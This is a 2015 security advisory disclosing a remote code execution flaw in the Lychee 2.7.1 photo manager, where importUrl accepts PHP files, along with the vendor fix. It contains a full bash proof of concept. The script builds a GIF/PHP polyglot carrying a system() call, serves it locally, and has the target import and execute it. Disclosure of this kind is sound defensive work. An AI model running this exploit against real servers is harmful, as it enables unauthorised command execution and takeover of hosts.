Lychee 2.7.1 remote code execution

2015-05-12T00:00:00
ID SECURITYVULNS:DOC:32092
Type securityvulns
Reporter Securityvulns
Modified 2015-05-12T00:00:00

Description

Advisory ID: SGMA15-002 Title: Lychee remote code execution Product: Lychee Version: 2.7.1 and probably prior Vendor: lychee.electerious.com Vulnerability type: Remote Code Execution Risk level: High Credit: Filippo Cavallarin - segment.technology CVE: N/A Vendor notification: 2015-04-12 Vendor fix: 2015-04-13 Public disclosure: 2015-04-15

Details

Lychee version 2.7.1 and probably below suffers from remote code execution vulnerability.

The vulnerability resides in the importUrl function that fails to restrict file types due to the lack of file extension validation. Since the imported file is stored in a web-readable directory where php files can be executed, remote code execution can be achieved.

Even if the import is limited to image files only, an attacker can abuse this vulnerability by importing a specially crafted image file containing PHP code.

To exploit this vulnerability the attacker must be logged as administrator.

The following proof of concept demostrates the issue

!/bin/bash

LYCHEE_HOST="lychee.local" PHPSESSID="e0ac560kmqf0lli9u5jd20qt46" LOCALIP="172.16.85.1" CMD="uname -a"

cd /tmp || exit 1

echo "Creating gif..." GIF="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x21\xFE\x1A<?php system('$CMD')?>" echo -e $GIF > gif.php

echo "Starting local webserver" python -m SimpleHTTPServer > /dev/null 2>&1 &

sleep 1

echo "Starting the import procedure" curl "http://$LYCHEE_HOST/php/api.php" -H "Cookie: PHPSESSID=$PHPSESSID" --data "function=importUrl&url=http%3A//$LOCALIP:8000/gif.php&albumID=0"

sleep 5

kill %1 rm gif.php

echo "Executing command.." curl "http://$LYCHEE_HOST/data/gif.php"

EOF

Solution

Upgrade to Lychee version 2.7.2

References http://lychee.electerious.com

Filippo Cavallarin https://segment.technology/